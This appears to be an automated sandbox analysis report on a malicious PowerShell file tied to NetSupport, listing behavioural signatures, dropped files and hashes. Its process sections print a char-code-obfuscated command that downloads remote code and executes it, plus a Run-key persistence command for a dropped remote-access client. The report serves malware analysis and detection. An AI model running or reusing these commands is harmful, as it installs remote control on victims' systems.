Analysis Overview
SHA256
8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Threat Level: Known bad
The file rt.php.ps1 was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Deletes itself
Adds Run key to start application
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-30 17:14
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win7-20230220-en
Max time kernel
1600s
Max time network
1602s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win10v2004-20230220-en
Max time kernel
1552s
Max time network
1756s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\34dW5imkHZMP\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1908 wrote to memory of 3384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1908 wrote to memory of 3384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3384 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 3384 wrote to memory of 2772 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 1908 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1908 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe""
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puvg0ve5.tfy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d6ca57a0b3d565156f3c053e1c0743b6 |
| SHA1 | bf9251134a1e54956fd943969588382917d7b2f6 |
| SHA256 | 35f9a5113cfed3fe3df6f0d5ef92c573e70d4aadc61b556973974d3f90d0b855 |
| SHA512 | aa891c80594b815e065601891656cef0996a1f8507dadec3381b33cb479a5921877b94da08b88dba6b7b2b6e9628458b592969cd2e4d36ad295264244fe5790d |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-30 17:14
Reported
2023-05-30 17:45
Platform
win10-20230220-en
Max time kernel
403s
Max time network
1758s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\f9Av6lBR2ENs\\whost.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1608 wrote to memory of 4760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 4760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4760 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 4760 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\HOSTNAME.EXE |
| PID 1608 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block
C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe""
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfemd1is.4ti.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56efdb5a0f10b5eece165de4f8c9d799 |
| SHA1 | fa5de7ca343b018c3bfeab692545eb544c244e16 |
| SHA256 | 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108 |
| SHA512 | 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | df1a4ff784a50670244eb782884af91f |
| SHA1 | 0dbcddbafcc416b4b35820d9ae83ee70f63f2d2a |
| SHA256 | 93445522a6ba5648bd6618ca3ef2a70ee0a767fe87dcb7450aa939860e90f1ae |
| SHA512 | eb252587929d2538adc642b0d18c6c94a23a5949262ea11256b2d1b7c108c7f4f95bf66a7d9bfece81bff522c972191867ed44739d76ef5df43d032b53899593 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2a93d653c9708e9b42505380eb60a1da |
| SHA1 | abb42a825497e56c3006d53a48d776cc3ff8f5a9 |
| SHA256 | a91f1a988cf3729c94e1d0d0fda0d379462ae678c487e6d179f5ca1f4e1a948e |
| SHA512 | 44505d7ee19221379372155a26377ec1e7acc1c34823b0d8bd9e20379cc1e980ead4de8304e02dfe448ee5b642d94e47d7796eef1d13e6179b758217f3173013 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |